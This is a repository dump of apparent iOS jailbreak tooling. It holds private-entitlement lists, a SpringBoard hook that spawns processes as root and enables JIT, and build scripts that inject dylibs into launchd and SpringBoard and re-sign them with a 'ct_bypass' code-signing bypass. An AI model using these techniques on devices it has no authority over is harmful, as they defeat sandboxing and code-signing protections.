com.apple.Pasteboard.trusted-authentication-message-request com.apple.PerformanceTrace.Tracing com.apple.QuartzCore.cache-asynchronous com.apple.QuartzCore.debug com.apple.QuartzCore.displayable-context com.apple.QuartzCore.flipbook com.apple.QuartzCore.global-capture com.apple.QuartzCore.occlusion-override com.apple.QuartzCore.secure-capture com.apple.QuartzCore.secure-mode com.apple.QuartzCore.system-layers com.apple.SystemConfiguration.SCDynamicStore-write-access com.apple.SystemConfiguration.SCPreferences-write-access com.apple.AutoWake.xml preferences.plist com.apple.radios.plist com.apple.TapToRadarKit.service-access com.apple.abm.helper.mobile.allow com.apple.accounts.appleaccount.fullaccess com.apple.assistant.announcement_state com.apple.assistant.client com.apple.assistant.settings com.apple.authkit.client.private com.apple.authkit.writer.internal com.apple.avfoundation.allow-identifying-output-device-details com.apple.avfoundation.allow-still-image-capture-shutter-sound-manipulation com.apple.avfoundation.allow-system-wide-context com.apple.avfoundation.allows-access-to-device-list com.apple.avfoundation.allows-set-output-device com.apple.backboard.client com.apple.backboard.display.archive com.apple.backboard.displaybrightness com.apple.backboardd.cancelsTouchesInHostedContent com.apple.backboardd.displayArrangement com.apple.backboardd.eventAuthenticationVerification com.apple.backboardd.global-pointer-event-routing com.apple.backboardd.hostCanRequireTouchesFromHostedContent com.apple.backboardd.lastUserEventTime com.apple.backboardd.launchapplications com.apple.backboardd.pointerAutomation com.apple.backboardd.pointerRepositioning com.apple.backboardd.touchDeliveryObservation com.apple.backboardd.transferTouches com.apple.backboardd.virtualDisplay com.apple.bannerkit.post com.apple.biome.PublicStreamAccessService com.apple.bluetooth.system com.apple.bulletinboard com.apple.bulletinboard.dataprovider com.apple.bulletinboard.observer com.apple.bulletinboard.serverconduit com.apple.bulletinboard.settings com.apple.bulletinboard.systemstate com.apple.bulletinboard.utilities com.apple.cards.all-access com.apple.chronod.toolservices com.apple.chronoservices com.apple.coreaudio.CanRecordPastData com.apple.coreaudio.allow-amr-decode com.apple.coreaudio.allow-opus-codec com.apple.coreaudio.allow-speex-codec com.apple.coreduetd.allow com.apple.coreduetd.batterysaver.allow com.apple.coreduetd.context com.apple.coreduetd.knowledge com.apple.coremedia.allow-pre-wiring-pixel-buffers com.apple.coremedia.allow-protected-content-playback com.apple.coremedia.virtualdisplaysession com.apple.developer.extension-host.widget-extension com.apple.developer.homekit com.apple.developer.ubiquity-kvstore-identifier com.apple.springboard com.apple.duet.activityscheduler.allow com.apple.duet.expertcenter.consumer com.apple.extensionkit.host.extension-point-identifiers com.apple.SoundScapesViewServices.ViewService com.apple.fileprovider.acl-write com.apple.fileprovider.enumerate com.apple.fileprovider.fetch-url com.apple.frontboard.app-badge-value-access com.apple.frontboard.launchapplications com.apple.frontboard.shutdown com.apple.frontboardservices.display-layout-monitor com.apple.geoservices.navigation_info com.apple.homekit.private-spi-access com.apple.iapd.accessibility com.apple.icloud.findmydeviced.access com.apple.icloud.findmydeviced.findmydevice-user-agent.access com.apple.icloud.fmfd.access com.apple.icloud.searchpartyd.beaconmanager com.apple.idle-timer-services com.apple.imagent com.apple.imagent.av com.apple.imagent.chat com.apple.intents.extension.discovery com.apple.intents.uiextension.discovery com.apple.internal.seserviced.all.endpoints.and.cas com.apple.internal.seserviced.ptattestation com.apple.itunesstored.private com.apple.keystore.device com.apple.keystore.lockassertion com.apple.keystore.stash.access com.apple.launchservices.clearadvertisingid com.apple.localizationswitcher com.apple.locationd.activity com.apple.locationd.asmanager com.apple.locationd.authorizeapplications com.apple.locationd.effective_bundle com.apple.locationd.motion_alarms com.apple.locationd.place_inference com.apple.locationd.prompt_behavior com.apple.locationd.region_proxy_service com.apple.locationd.status com.apple.locationd.usage_oracle com.apple.locationd.vehicle_data com.apple.logind.client.entitlement com.apple.lsapplicationproxy.deviceidentifierforvendor com.apple.managedconfiguration.mdmd-access com.apple.managedconfiguration.profiled-access com.apple.mediaremote.ui-control com.apple.mediastream.mstreamd-access com.apple.messages.composeclient com.apple.mkb.usersession.info com.apple.mkb.usersession.loginwindow com.apple.mobile.deleted.AllowFreeSpace com.apple.mobile.keybagd.UserManager.logoutcritical com.apple.mobilemail.mailservices com.apple.multitasking.systemappassertions com.apple.multitasking.termination com.apple.nano.nanoregistry.generalaccess com.apple.nfcd.hwmanager com.apple.nfcd.radio.powertoggle com.apple.nfcd.seshat com.apple.nfcd.session.ecommerce com.apple.nfcd.session.fieldOperations com.apple.nfcd.session.peerpayment com.apple.nfcd.session.reader.internal com.apple.nfcd.session.se com.apple.nfcd.session.trust com.apple.nfcd.singleUser com.apple.notificationcenter.widgetcontrollerhascontent com.apple.osanalytics.otatasking-service-access com.apple.payment.configuration com.apple.payment.presentation com.apple.photos.bourgeoisie com.apple.pointerui.persistentlyHidePointer com.apple.pointerui.service-keep-alive-assertion com.apple.pointerui.set-system-cursor-interaction-context com.apple.posterboardservices.data-store com.apple.posterboardservices.data-store.accessSwitcherConfiguration com.apple.powerd.lowpowermode.allow com.apple.private.CallHistory.read com.apple.private.ClipServices com.apple.private.CoreAuthentication.SPI com.apple.private.InstallCoordination.allowed com.apple.private.MobileContainerManager.otherIdLookup com.apple.private.MobileGestalt.AllowedProtectedKeys InverseDeviceID com.apple.private.ReplayKitAngel.client com.apple.private.SafariServices.PasswordPicker.setRemoteAppProperties com.apple.private.ShazamKit com.apple.private.WebClips.read-write com.apple.private.accessories.showallconnections com.apple.private.accounts.allaccounts com.apple.private.activitykit.activityAuthorizer com.apple.private.activitykit.activityEnder com.apple.private.activitykit.alertPresenter com.apple.private.activitykit.assertionRequester com.apple.private.activitykit.listener com.apple.private.activitykit.presentationAssertionRequester com.apple.private.activitykit.prominenceObserver com.apple.private.airdrop.settings com.apple.private.appleaccount.app-hidden-from-icloud-settings com.apple.private.applecredentialmanager.allow com.apple.private.appstored Repair TestFlightFeedback StoreKitExternalNotification Update com.apple.private.assets.accessible-asset-types com.apple.MobileAsset.DuetExpertCenterAsset com.apple.private.attentionawareness com.apple.private.attentionawareness.poll com.apple.private.attribution.implicitly-assumed-identity type path value /System/Library/CoreServices/SpringBoard.app/SpringBoard com.apple.private.barcodesupport.allowNotifications com.apple.private.biome.read-only AppLaunch InferredMode Notification ScreenSharing HomeKitClientAccessoryControl HomeKitClientMediaAccessoryControl HomeKitClientActionSet com.apple.private.biome.read-write SiriUI Device.Display.Appearance Device.Display.AlwaysOn OSAnalytics.Hardware.Reliability com.apple.private.biome.realTimeSensorSession com.apple.private.bmk.allow com.apple.private.calendar.allow-suggestions com.apple.private.canGetAppLinkInfo com.apple.private.canModifyAppLinkPermissions com.apple.private.carkit com.apple.private.carkit.app com.apple.private.carkit.dnd com.apple.private.clouddocs.can-grant-access-to-document com.apple.private.contactsui com.apple.private.coordination.alarms com.apple.private.coordination.timers com.apple.private.coreaudio.borrowaudiosession.allow com.apple.private.coreaudio.mxsessionPropertyPipe com.apple.private.coremedia.interruptions.phonecallpriority.allow com.apple.private.corerecents com.apple.private.coreservices.canmaplsdatabase com.apple.private.coreservices.canopenactivity com.apple.private.coreservices.lsuseractivityd.bestappsuggestion com.apple.private.corespotlight.internal com.apple.private.corespotlight.search.internal com.apple.private.corewifi.internal com.apple.private.dmd.policy com.apple.private.donotdisturb.behavior.resolution.client-identifiers com.apple.springboard.SBBulletinSpokenObserverGateway com.apple.springboard.NCBulletinNotificationSource com.apple.private.donotdisturb.mode.assertion.client-identifiers com.apple.donotdisturb.control-center.module com.apple.springboard.donotdisturb.notifications com.apple.springboard.donotdisturb.hid com.apple.focus.activity-manager com.apple.private.donotdisturb.mode.assertion.user-requested.client-identifiers com.apple.donotdisturb.control-center.module com.apple.springboard.donotdisturb.notifications com.apple.springboard.donotdisturb.hid com.apple.focus.activity-manager com.apple.private.donotdisturb.modeconfiguration.modify.client-identifiers com.apple.focus.activity-manager com.apple.focussettingsui.activity-config com.apple.springboard.donotdisturb.notifications com.apple.springboard.NCModeManager com.apple.private.donotdisturb.modeconfiguration.request.client-identifiers com.apple.focus.activity-manager com.apple.focussettingsui.activity-config com.apple.springboard.donotdisturb.notifications com.apple.springboard.NCModeManager com.apple.proactive.AppPredictionClient com.apple.springboard.focusappconfigurationcontextmonitor com.apple.private.donotdisturb.modeconfiguration.updates.client-identifiers com.apple.focus.activity-manager com.apple.focussettingsui.activity-config com.apple.springboard.donotdisturb.notifications com.apple.proactive.AppPredictionClient com.apple.springboard.SBIconController com.apple.springboard.NCModeManager com.apple.springboard.focusappconfigurationcontextmonitor com.apple.FocusSettings com.apple.private.donotdisturb.settings.request.client-identifiers com.apple.springboard.donotdisturb.notifications com.apple.donotdisturb.control-center.module com.apple.focus.activity-manager com.apple.springboard.SBIconController com.apple.proactive.AppPredictionClient com.apple.private.donotdisturb.settings.updates.client-identifiers com.apple.springboard.donotdisturb.notifications com.apple.private.donotdisturb.state.request.client-identifiers com.apple.springboard.SBIconController com.apple.springboard.SBDashBoardCombinedListViewController com.apple.donotdisturb.control-center.module com.apple.springboard.donotdisturb.notifications com.apple.springboard.donotdisturb.awdmetrics com.apple.springboard.dashboard.bedtime com.apple.accessibility.visual.alerts com.apple.springboard.donotdisturb.hid com.apple.springboard.SBDoNotDisturbMetric com.apple.focus.activity-manager com.apple.springboard.NCModeManager com.apple.springboard.dndstatemonitor com.apple.springboard.CoverSheetDiscoveryProvider com.apple.private.donotdisturb.state.updates.client-identifiers com.apple.springboard.SBIconController com.apple.springboard.SBDashBoardCombinedListViewController com.apple.donotdisturb.control-center.module com.apple.springboard.donotdisturb.notifications com.apple.springboard.donotdisturb.awdmetrics com.apple.springboard.dashboard.bedtime com.apple.accessibility.visual.alerts com.apple.springboard.donotdisturb.hid com.apple.springboard.SBDoNotDisturbMetric com.apple.focus.activity-manager com.apple.springboard.NCModeManager com.apple.springboard.dndstatemonitor com.apple.springboard.CoverSheetDiscoveryProvider com.apple.private.externalaccessory.showallaccessories com.apple.private.followup com.apple.private.game-center Account Games com.apple.private.game-center.bypass-authentication com.apple.private.healthkit com.apple.private.healthkit.feature-availability.read SleepCoaching com.apple.private.healthkit.read_authorization_override HKCategoryTypeIdentifierSleepAnalysis com.apple.private.healthkit.source_override com.apple.mobiletimer com.apple.private.healthkit.write_authorization_override HKCategoryTypeIdentifierSleepAnalysis com.apple.private.hid.client.event-dispatch com.apple.private.hid.client.service-protected com.apple.private.hid.manager.client com.apple.private.homekit com.apple.private.homekit.allow-secure-access com.apple.private.icfcallserver com.apple.private.ids.idsquery com.apple.private.ids.messaging com.apple.private.alloy.bulletinboard com.apple.private.alloy.donotdisturb com.apple.madrid com.apple.private.alloy.siri.phrasespotter com.apple.private.ids.messaging.urgent-priority com.apple.private.alloy.bulletinboard com.apple.private.alloy.donotdisturb com.apple.private.alloy.siri.phrasespotter com.apple.private.ids.registration-reset com.apple.private.imavcore.imavagent com.apple.private.imcore.imdpersistence.database-access com.apple.private.imcore.imremoteurlconnection com.apple.private.imcore.spi.database-access com.apple.private.in-app-payments com.apple.private.iokit.powersource-control com.apple.private.kernel.darkboot com.apple.private.kernel.jetsam com.apple.private.librarian.can-get-application-info com.apple.private.lockdown.finegrained-get NULL/ActivationState NULL/BrickState NULL/SBLockdownEverRegisteredKey com.apple.xcode.developerdomain/DeveloperStatus NULL/BuildExpireTime com.apple.private.lockdown.finegrained-remove com.apple.mobile.iTunes.store/AppleID com.apple.mobile.data_sync/Contacts com.apple.mobile.data_sync/Calendars com.apple.mobile.data_sync/Bookmarks com.apple.mobile.data_sync/Mail Accounts com.apple.private.mediaexperience.allowemergencyalertpriority com.apple.private.mediasafetynet.exception.notificationappex com.apple.private.mis.online_auth_agent com.apple.private.mobileinstall.allowedSPI UninstallForLaunchServices SetCapabilities Lookup com.apple.private.mobilesafari.searchengine com.apple.private.mobilestoredemo.enabledemo Manage com.apple.private.mobiletimerd com.apple.private.nearbyinteraction.system-shutdown com.apple.private.network.socket-delegate com.apple.private.networkextension.configuration com.apple.private.persona.read com.apple.private.photos.service.demo com.apple.private.photos.service.multilibrary com.apple.private.ppm.superclient com.apple.private.replay-kit com.apple.private.rtcreportingd com.apple.private.screen-time com.apple.private.security.container-manager com.apple.private.security.storage.AppDataContainers com.apple.private.security.storage.Calendar com.apple.private.security.storage.Photos com.apple.private.security.storage.clipserviced com.apple.private.security.storage.familycircled com.apple.private.security.storage.triald com.apple.private.sessionkit.alertPresenter com.apple.private.sessionkit.assertionRequester com.apple.private.sessionkit.custom-platter-target com.apple.private.sessionkit.listener com.apple.private.sessionkit.permitMultipleProcessInputs com.apple.private.sessionkit.presentationAssertionRequester com.apple.private.sessionkit.prominenceObserver com.apple.private.sessionkit.sessionFinisher com.apple.private.sessionkit.sessionRequest com.apple.private.sharing.unlock-manager com.apple.private.shazamkit.allow-external-audio-recording com.apple.private.shazamkit.allow-internal-audio-recording com.apple.private.sleepd com.apple.private.suggestions.contacts com.apple.private.suggestions.events com.apple.private.system-keychain com.apple.private.tcc.allow kTCCServiceAddressBook kTCCServiceCalendar kTCCServiceReminders kTCCServicePhotos kTCCServicePhotosAdd kTCCServiceMediaLibrary kTCCServiceMicrophone kTCCServiceCamera kTCCServiceWillow kTCCServiceFaceID kTCCServiceBluetoothAlways com.apple.private.tcc.manager.access.read kTCCServiceFocusStatus com.apple.private.tipsd.discoverability com.apple.private.tty.settings com.apple.private.ubiquity-kvstore-access com.apple.weather com.apple.stocks com.apple.backboardd com.apple.Accessibility com.apple.Accessibility.SwitchControl com.apple.Accessibility.TouchAccommodations com.apple.AssistiveTouch com.apple.HearingAids com.apple.SpeakSelection com.apple.VoiceOverTouch com.apple.ZoomTouch com.apple.private.usernotifications.bundle-identifiers com.apple.donotdisturb com.apple.mobiletimer com.apple.usernotifications.example com.apple.private.usernotifications.settings read com.apple.private.vfs.allow-low-space-writes com.apple.private.vfs.open-by-id com.apple.private.wallpaperkit.service.migration com.apple.private.xpc.launchd.app-server com.apple.proactive.ActionPrediction.predictions com.apple.proactive.AppPrediction.predictions com.apple.proactive.DefaultWidgetSuggester com.apple.proactive.NotificationDigest.xpc com.apple.proactive.ProactiveSuggestionClientModel.xpc com.apple.proactive.SuggestedPages com.apple.proactive.UserEducationSuggestion.server-listener.xpc com.apple.proactive.appDirectory com.apple.proactive.eventtracker com.apple.proactive.hero.AppPrediction.predictions com.apple.proactive.infoSuggestion.xpc com.apple.purplebuddy.budd.access com.apple.remotenotification.access com.apple.remotenotification.preferences com.apple.rootless.storage.com.apple.MobileAsset.DuetExpertCenterAsset com.apple.rootless.storage.coreduet_knowledge_store com.apple.rootless.storage.proactivepredictions com.apple.runningboard.hereditarygrantoriginator com.apple.runningboard.posterkit.host com.apple.runningboard.primitiveattribute com.apple.runningboard.process-state com.apple.runningboard.request.identity com.apple.runningboard.terminateprocess com.apple.runningboard.underlyingassertion com.apple.securebackupd.access com.apple.security.application-groups group.com.apple.weather group.com.apple.stocks com.apple.Home.group com.apple.security.enterprise-volume-access com.apple.security.exception.files.absolute-path.read-only /private/var/mobile/Library/Trial/NamespaceDescriptors/ /private/var/mobile/Library/Trial/Treatments/180/ com.apple.security.exception.mach-lookup.global-name com.apple.sirittsd com.apple.proactive.UserEducationSuggestion.server-listener.xpc com.apple.Photos.MultiLibrary com.apple.abm.helper.mobile com.apple.siri.activation.service com.apple.springboard.SBRendererService com.apple.appstored.xpc com.apple.appstored.xpc.request com.apple.PointerUI.pointeruid.service-launching com.apple.proactive.appDirectory com.apple.CarPlayApp.service com.apple.sleepd.sleepserver com.apple.donotdisturb.service com.apple.coordination.alarms com.apple.coordination.timers com.apple.tipsd com.apple.ModeEntityScorer com.apple.proactive.NotificationDigest.xpc com.apple.assistant.announcement_state.service com.apple.icloud.searchpartyd.beaconmanager com.apple.server.bluetooth.general.xpc com.apple.powerd.smartpowernap com.apple.biomesyncd.realTimeSession com.apple.sessionservices aps-connection-initiate com.apple.mobileassetd.v2 com.apple.HearingApp com.apple.security.exception.shared-preference.read-only com.apple.appstored com.apple.itunesstored com.apple.suggestions com.apple.security.iokit-user-client-class IOUserClient com.apple.security.system-container com.apple.security.system-groups systemgroup.com.apple.sharedpclogging systemgroup.com.apple.regulatory_images systemgroup.com.apple.userimagecache com.apple.seld.tsmamnager com.apple.seserviced.key com.apple.seserviced.kmlXpcService com.apple.sharing.Client com.apple.sharing.CoordinatedAlerts com.apple.sharing.Diagnostics com.apple.sharing.Session com.apple.siri.VoiceShortcuts.xpc com.apple.siri.activation.assertion com.apple.siri.activation.button-event.listener com.apple.siri.activation.service com.apple.siri.client_lite com.apple.siri.external_request com.apple.sos.trigger com.apple.soundscapes.picker com.apple.splashboard.launch-image-capture com.apple.springboard-ui.client com.apple.springboard.activateRemoteAlert com.apple.springboard.activateawayviewplugins com.apple.springboard.allowallcallurls com.apple.springboard.application-removability.proxy com.apple.springboard.display-lookup com.apple.springboard.lockScreenContentAssertion com.apple.springboard.multiwindow.triggerShowAllWindows com.apple.springboard.opensensitiveurl com.apple.springboard.openurlswhenlocked com.apple.springboard.setbadgestring com.apple.springboard.shortcutitems.fullaccess com.apple.springboard.statusbarstyleoverrides com.apple.springboard.statusbarstyleoverrides.coordinator UIStatusBarStyleOverrideAutoAirPlayReady UIStatusBarStyleOverrideAutoAirPlayPlaying com.apple.symptom_analytics.query com.apple.symptom_analytics.refresh com.apple.symptoms.NetworkOfInterest com.apple.telephonyutilities.callservicesd access-calls modify-calls access-call-providers access-moments com.apple.timed com.apple.trial.client 962 com.apple.tzlink.allow com.apple.ui-services-discovery com.apple.videoconference.allow-conferencing com.apple.visualvoicemail.client com.apple.voiceservices.tts.customvoice com.apple.voicetrigger.voicetriggerservice com.apple.wallet.banner com.apple.watchlist.private com.apple.wifi.manager-access com.apple.wipedevice fairplay-client 1172857363 get-task-allow keychain-access-groups apple com.apple.preferences vm-pressure-level ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/.gitignore ================================================ .theos/ packages/ .DS_Store ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/Makefile ================================================ TARGET := iphone:clang:latest:15.0 ARCHS = arm64e THEOS_PACKAGE_SCHEME=roothide INSTALL_TARGET_PROCESSES = SpringBoard include $(THEOS)/makefiles/common.mk TWEAK_NAME = SpringBoardHook SpringBoardHook_FILES = Tweak.x SpringBoardHook_CFLAGS = -fobjc-arc -lbsm after-package:: echo "[*] Signing SB hook" ../../../ChOma/output/tests/ct_bypass -i .theos/obj/debug/springboardhook.dylib -o springboardhooksigned.dylib include $(THEOS_MAKE_PATH)/tweak.mk ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/SpringBoardHook.plist ================================================ { Filter = { Bundles = ( "com.apple.springboard" ); }; } ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/Tweak.x ================================================ #include #include #include #include #include #include #include #include #define POSIX_SPAWN_PERSONA_FLAGS_OVERRIDE 1 int posix_spawnattr_set_persona_np(const posix_spawnattr_t* __restrict, uid_t, uint32_t); int posix_spawnattr_set_persona_uid_np(const posix_spawnattr_t* __restrict, uid_t); int posix_spawnattr_set_persona_gid_np(const posix_spawnattr_t* __restrict, uid_t); int fd_is_valid(int fd) { return fcntl(fd, F_GETFD) != -1 || errno != EBADF; } NSString* getNSStringFromFile(int fd) { NSMutableString* ms = [NSMutableString new]; ssize_t num_read; char c; if(!fd_is_valid(fd)) return @""; while((num_read = read(fd, &c, sizeof(c)))) { [ms appendString:[NSString stringWithFormat:@"%c", c]]; if(c == '\n') break; } return ms.copy; } int spawnRoot(NSString* path, NSArray* args, NSString** stdOut, NSString** stdErr) { NSMutableArray* argsM = args.mutableCopy ?: [NSMutableArray new]; [argsM insertObject:path.lastPathComponent atIndex:0]; NSUInteger argCount = [argsM count]; char **argsC = (char **)malloc((argCount + 1) * sizeof(char*)); for (NSUInteger i = 0; i < argCount; i++) { argsC[i] = strdup([[argsM objectAtIndex:i] UTF8String]); } argsC[argCount] = NULL; posix_spawnattr_t attr; posix_spawnattr_init(&attr); posix_spawnattr_set_persona_np(&attr, 99, POSIX_SPAWN_PERSONA_FLAGS_OVERRIDE); posix_spawnattr_set_persona_uid_np(&attr, 0); posix_spawnattr_set_persona_gid_np(&attr, 0); posix_spawn_file_actions_t action; posix_spawn_file_actions_init(&action); int outErr[2]; if(stdErr) { pipe(outErr); posix_spawn_file_actions_adddup2(&action, outErr[1], STDERR_FILENO); posix_spawn_file_actions_addclose(&action, outErr[0]); } int out[2]; if(stdOut) { pipe(out); posix_spawn_file_actions_adddup2(&action, out[1], STDOUT_FILENO); posix_spawn_file_actions_addclose(&action, out[0]); } pid_t task_pid; int status = -200; int spawnError = posix_spawn(&task_pid, [path UTF8String], &action, &attr, (char* const*)argsC, NULL); posix_spawnattr_destroy(&attr); for (NSUInteger i = 0; i < argCount; i++) { free(argsC[i]); } free(argsC); if(spawnError != 0) { NSLog(@"posix_spawn error %d\n", spawnError); return spawnError; } do { if (waitpid(task_pid, &status, 0) != -1) { NSLog(@"Child status %d", WEXITSTATUS(status)); } else { perror("waitpid"); return -222; } } while (!WIFEXITED(status) && !WIFSIGNALED(status)); if(stdOut) { close(out[1]); NSString* output = getNSStringFromFile(out[0]); *stdOut = output; } if(stdErr) { close(outErr[1]); NSString* errorOutput = getNSStringFromFile(outErr[0]); *stdErr = errorOutput; } return WEXITSTATUS(status); } %hook CSStatusTextView - (void)setInternalLegalText:(NSString *)string { %orig(@":troll:"); } %end bool OpenedTweaks = false; bool os_variant_has_internal_content(const char* subsystem); %hookf(bool, os_variant_has_internal_content, const char* subsystem) { if (OpenedTweaks == false) { //const char* path = jbroot("/Library/MobileSubstrate/DynamicLibraries"); //DIR *dir; //struct dirent *ent; // if ((dir = opendir(path)) != NULL) { // while ((ent = readdir(dir)) != NULL) { // if (ent->d_type == DT_REG && strstr(ent->d_name, ".dylib")) { // char filePath[256]; // snprintf(filePath, sizeof(filePath), "%s/%s", path, ent->d_name); // dlopen(filePath, RTLD_NOW | RTLD_GLOBAL); // } // } spawnRoot(jbroot(@"/basebin/bootstrapd"), @[@"daemon",@"-f"], nil, nil); dlopen(jbroot(@"/basebin/bootstrap.dylib").UTF8String, RTLD_GLOBAL | RTLD_NOW); OpenedTweaks = true; return true; } else { return true; } } #define CS_DEBUGGED 0x10000000 int csops(pid_t pid, unsigned int ops, void *useraddr, size_t usersize); int fork(); int ptrace(int, int, int, int); int isJITEnabled() { int flags; csops(getpid(), 0, &flags, sizeof(flags)); return (flags & CS_DEBUGGED) != 0; } %ctor { if (!isJITEnabled()) { // Enable JIT int pid = fork(); if (pid == 0) { ptrace(0, 0, 0, 0); exit(0); } else if (pid > 0) { while (wait(NULL) > 0) { usleep(1000); } } } } ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/build.sh ================================================ make ldid -S../../launchdentitlements.plist -Cadhoc .theos/obj/debug/SpringBoardHook.dylib /Users/ibarahime/ChOma/ct_bypass -i .theos/obj/debug/SpringBoardHook.dylib -r -o springboardhooksigned.dylib ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/control ================================================ Package: com.yourcompany.springboardhook Name: SpringBoardHook Version: 0.0.1 Architecture: iphoneos-arm Description: An awesome MobileSubstrate tweak! Maintainer: LL Author: LL Section: Tweaks Depends: mobilesubstrate (>= 0.9.5000) ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/build.sh ================================================ function replaceByte() { printf "\x00\x00\x00\x00" | dd of="$1" bs=1 seek=$2 count=4 conv=notrunc &> /dev/null } make # /Users/ibarahime/insert_dylib/insert_dylib/insert_dylib /var/jb/usr/lib/ellekit/libinjector.dylib .theos/obj/debug/arm64e/springboardshim springboardshiminjected --all-yes # /Users/ibarahime/insert_dylib/insert_dylib/insert_dylib /var/jb/usr/lib/libellekit.dylib springboardshiminjected springboardshiminjected --all-yes /Users/ibarahime/insert_dylib/insert_dylib/insert_dylib @loader_path/springboardhook.dylib .theos/obj/debug/arm64e/springboardshim springboardshiminjected --all-yes # replaceByte 'springboardshiminjected' 8 ldid -SSpringBoardEnts.plist springboardshiminjected /Users/ibarahime/ChOma/ct_bypass -i springboardshiminjected -r -o springboardshimsignedinjected ================================================ FILE: RootHelperSample/launchdshim/SpringBoardShim/main.c ================================================ #include #include #include #include #include int (*SBSystemAppMain)(int argc, char *argv[], char *envp[], char* apple[]); int main(int argc, char *argv[], char *envp[], char* apple[]) { void *handle = dlopen("/System/Library/PrivateFrameworks/SpringBoard.framework/SpringBoard", RTLD_GLOBAL); SBSystemAppMain = dlsym(handle, "SBSystemAppMain"); return SBSystemAppMain(argc, argv, envp, apple); } ================================================ FILE: RootHelperSample/launchdshim/build.sh ================================================ function replaceByte() { printf "\x00\x00\x00\x00" | dd of="$1" bs=1 seek=$2 count=4 conv=notrunc &> /dev/null } replaceByte 'launchd' 8 # /Users/ibarahime/insert_dylib/insert_dylib/insert_dylib /var/jb/usr/lib/ellekit/libinjector.dylib .theos/obj/debug/arm64e/springboardshim springboardshiminjected --all-yes # /Users/ibarahime/insert_dylib/insert_dylib/insert_dylib /var/jb/usr/lib/libellekit.dylib springboardshiminjected springboardshiminjected --all-yes /Users/ibarahime/insert_dylib/insert_dylib/insert_dylib @loader_path/launchdhook.dylib launchd launchdinjected --all-yes ldid -Slaunchdentitlements.plist launchdinjected /Users/ibarahime/ChOma/ct_bypass -i launchdinjected -r -o launchdsignedinjected ================================================ FILE: RootHelperSample/launchdshim/launchdentitlements.plist ================================================ com.apple.private.security.no-sandbox com.apple.private.domain-extension com.apple.private.security.container-required com.apple.private.security.no-container com.apple.private.skip-library-validation com.apple.private.xpc.domain-extension com.apple.private.xpc.domain-extension.proxy com.apple.private.xpc.launchd.app-state-manager com.apple.private.xpc.launchd.enable-disable-system-services com.apple.private.xpc.launchd.event-monitor com.apple.private.xpc.launchd.loginitem-bootstrapper com.apple.private.xpc.launchd.loginitem-outside-bundle com.apple.private.xpc.launchd.obliterator com.apple.private.xpc.launchd.per-user-create.mbsetupuser com.apple.private.xpc.launchd.per-user-lookup com.apple.private.xpc.launchd.reboot com.apple.private.xpc.launchd.service-hold com.apple.private.xpc.launchd.userspace-reboot com.apple.private.xpc.launchd.userspace-reboot-now com.apple.private.xpc.persona-creator com.apple.private.xpc.persona-manager com.apple.private.persona-mgmt com.apple.private.xpc.service-attach com.apple.private.xpc.service-configure platform-application get-task-allow task_for_pid-allow com.apple.private.set-launch-type.internal com.apple.security.exception.mach-lookup.global-name com.apple.mmaintenanced com.apple.memory-maintenance com.apple.apfs.get-dev-by-role com.apple.private.amfi.can-allow-non-platform com.apple.private.iokit.system-nvram-allow com.apple.private.kernel.system-override com.apple.private.persona-mgmt com.apple.private.pmap.load-trust-cache cryptex1.boot.os cryptex1.boot.app cryptex1.safari-downlevel com.apple.private.record_system_event com.apple.private.roots-installed-read-write com.apple.private.security.disk-device-access com.apple.private.security.storage.driverkitd com.apple.private.security.storage.launchd com.apple.private.security.system-mount-authority com.apple.private.set-atm-diagnostic-flag com.apple.private.spawn-panic-crash-behavior com.apple.private.spawn-subsystem-root com.apple.private.vfs.allow-low-space-writes com.apple.private.vfs.graftdmg com.apple.private.vfs.pivot-root com.apple.rootless.restricted-block-devices com.apple.rootless.storage.early_boot_mount com.apple.rootless.volume.Preboot com.apple.security.network.server ================================================ FILE: RootHelperSample/launchdshim/launchdhook/Frameworks/IOMobileFramebuffer.framework/IOMobileFramebuffer.tbd ================================================ --- !tapi-tbd-v3 archs: [ armv7, armv7s, arm64, arm64e ] platform: ios flags: [ flat_namespace ] install-name: /System/Library/PrivateFrameworks/IOMobileFramebuffer.framework/IOMobileFramebuffer current-version: 1 compatibility-version: 1 exports: - archs: [ armv7, armv7s, arm64, arm64e ] symbols: [ _IOMobileFrameBufferEnableDebugTracing, _IOMobileFrameBufferEnableVBLTraces, _IOMobileFrameBufferGetDebugTraces, _IOMobileFrameBufferGetMirroringCapability, _IOMobileFrameBufferPrintDebugTraces, _IOMobileFrameBufferSetLogLevel, _IOMobileFrameBufferprintDisplayRegs, _IOMobileFramebufferALSSEnableWindows, _IOMobileFramebufferALSSGetRGBCoeffs, _IOMobileFramebufferALSSGetWindows, _IOMobileFramebufferALSSGetWindowsSums, _IOMobileFramebufferALSSSetRGBCoeffs, _IOMobileFramebufferALSSSetWindows, _IOMobileFramebufferChangeFrameInfo, _IOMobileFramebufferCopyLayerDisplayedSurface, _IOMobileFramebufferCopyProperty, _IOMobileFramebufferCreateDisplayList, _IOMobileFramebufferCreateStatistics, _IOMobileFramebufferDisableCRCNotifications, _IOMobileFramebufferDisableHotPlugDetectNotifications, _IOMobileFramebufferDisablePowerNotifications, _IOMobileFramebufferDisableVSyncNotifications, _IOMobileFramebufferEnableCRCNotifications, _IOMobileFramebufferEnableDisableDithering, _IOMobileFramebufferEnableDisableVideoPowerSavings, _IOMobileFramebufferEnableHotPlugDetectNotifications, _IOMobileFramebufferEnableMirroring, _IOMobileFramebufferEnablePowerNotifications, _IOMobileFramebufferEnableStatistics, _IOMobileFramebufferEnableVSyncNotifications, _IOMobileFramebufferFactoryPortal, _IOMobileFramebufferFrameInfo, _IOMobileFramebufferGetBlock, _IOMobileFramebufferGetBrightnessControlCapabilities, _IOMobileFramebufferGetBrightnessControlInfo, _IOMobileFramebufferGetBufBlock, _IOMobileFramebufferGetCRCNotifyMessageCount, _IOMobileFramebufferGetCRCRunLoopSource, _IOMobileFramebufferGetCanvasSizes, _IOMobileFramebufferGetColorRemapMode, _IOMobileFramebufferGetCurrentAbsoluteTime, _IOMobileFramebufferGetDigitalOutState, _IOMobileFramebufferGetDisplayArea, _IOMobileFramebufferGetDisplaySize, _IOMobileFramebufferGetDotPitch, _IOMobileFramebufferGetFrameworkInfo, 